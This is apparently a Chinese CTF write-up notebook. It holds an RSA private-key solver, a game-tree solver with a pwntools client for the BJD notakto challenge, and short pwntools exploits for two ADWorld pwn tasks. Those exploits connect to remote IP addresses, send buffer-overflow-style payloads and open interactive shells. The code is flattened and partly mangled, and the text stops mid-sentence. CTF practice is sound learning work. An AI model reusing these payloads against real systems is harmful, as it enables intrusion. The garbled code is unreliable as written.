# CTF Crypto RSA

python代码：

 12345678910111213141516171819202122232425262728293031323334353637383940414243 def CPPDiv(a,b):     return int(a/b) def CPPMod(a,b):     quotient = CPPDiv(a,b)     return a-b*quotient def ExGCD(a,b,x,y): # Return GCD,x,y     if b==0: return a, 1, 0     d, y, x = ExGCD(b, CPPMod(a,b), y ,x)     y -= CPPDiv(a,b)*x     return d, x, y def ExGCD_Cal(a,b):     return ExGCD(abs(a),abs(b),0,0)[1:] def QuickPow(a,b,MOD):     if b==0: return 1     result = QuickPow(a,b//2,MOD) % MOD     result *= result     if b&1==1: result *= a     result %= MOD     return result def solveRSAd(n,phi,e):     u, v = ExGCD_Cal(e, phi)     if v>0:         u += phi         v = e-v     return u def Main():     p = int(input("Prime p:"))     q = int(input("Prime q:"))     phi = (p-1)*(q-1)     n = p * q     print("Mod N: %d" % n)     e = int(input("Public Key e:"))     d = solveRSAd(n, phi, e)     print("Private Key d: %s" % d) if __name__ == '__main__':     Main()

 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 def CPPDiv(a,b):     return int(a/b) def CPPMod(a,b):     quotient = CPPDiv(a,b)     return a-b*quotient def ExGCD(a,b,x,y): # Return GCD,x,y     if b==0: return a, 1, 0     d, y, x = ExGCD(b, CPPMod(a,b), y ,x)     y -= CPPDiv(a,b)*x     return d, x, y def ExGCD_Cal(a,b):     return ExGCD(abs(a),abs(b),0,0)[1:] def QuickPow(a,b,MOD):     if b==0: return 1     result = QuickPow(a,b//2,MOD) % MOD     result *= result     if b&1==1: result *= a     result %= MOD     return result def solveRSAd(n,phi,e):     u, v = ExGCD_Cal(e, phi)     if v>0:         u += phi         v = e-v     return u def Main():     p = int(input("Prime p:"))     q = int(input("Prime q:"))     phi = (p-1)*(q-1)     n = p * q     print("Mod N: %d" % n)     e = int(input("Public Key e:"))     d = solveRSAd(n, phi, e)     print("Private Key d: %s" % d)     c = int(input("Cipher c:"))     m = pow(c,d,n)     print("Plain m: %s" % str(hex(m)))     if __name__ == '__main__':     Main()

https://www.freebuf.com/sectool/163781.html

# BJD CTF Programming notakto_1

C++有漏洞，够用就行：

 12345678910111213141516171819202122232425262728293031323334353637383940414243 #include #include using namespace std; int process[10] = { 4 }; bool visited[10]; inline int cal(int x, int y) {     return x * 3 + y; } bool& vis(int x, int y) {     return visited[cal(x, y)]; } bool check(int x, int y) {     bool flag = false;     flag |= vis(0, y) & vis(1, y) & vis(2, y);     flag |= vis(x, 0) & vis(x, 1) & vis(x, 2);     if (x == y)flag |= vis(0, 0) & vis(1, 1) & vis(2, 2);     if (x + y == 2)flag |= vis(0, 2) & vis(1, 1) & vis(2, 0);     return flag; } void print(int n) {     for (int i = 0; i <= n; i++) {         cout << process[i];     }     cout << endl; } void dfs(int step) {     bool flag = true;     for (int i = 0; i < 9; i++) {         if (visited[i])continue;         visited[i] = true;         process[step] = i;         if (check(i / 3, i % 3) == 0) {             dfs(step + 1);             flag = false;         }         visited[i] = false;     }     if (flag&&step%2==1)print(step); } int main() {     visited[4] = true;     dfs(1); }

python连带着往外发socket麻烦得很：

 12345678910111213141516171819202122232425262728293031323334353637383940414243 from pwn import * sock = remote("222.186.56.247",8122) wordList = [] currentWord = "" def findNewWord():     global currentWord,wordList     for elem in wordList:         if elem[0:len(currentWord)]==currentWord:             return elem     raise Exception("Error:Word Not found!") def loadDic():     global wordList     with open("situation.txt","r") as f:         wordList = f.readlines()     def getIntfromSock(sock):     sock.recvuntil("My move: ")     x = sock.recv(1)     if x==b' ': x = sock.recv(1)     return int(x) def payGame(i):     global currentWord,wordList,sock     print("the ith:",i)     currentWord=""     while len(currentWord) < 5:         backupWord = findNewWord()         print("Send:",backupWord[len(currentWord)])         sock.sendline(str(backupWord[len(currentWord)]))         currentWord += backupWord[len(currentWord)]         if len(currentWord)==5:             print("break")             break         currentWord += str(getIntfromSock(sock))         print("currentWord",currentWord)     sock.recvuntil("win!") loadDic() for i in range(150):     payGame(i) sock.interactive()

# ADWorld Pwn when_did_you_born

 1234567 from pwn import * p = remote("111.198.29.45",36585) p.sendlineafter("Birth?","0") payload=b'0'*(0x8)+p32(1926) print(len(payload)) p.sendlineafter("Name?",payload) p.interactive()

# ADWorld Pwn guess_num

Pwn代码如下

 12345 from pwn import * p = remote("111.198.29.45",44610) payload=bytearray('0'*0x24,"utf-8") p.sendline(payload) p.interactive()

base64解码得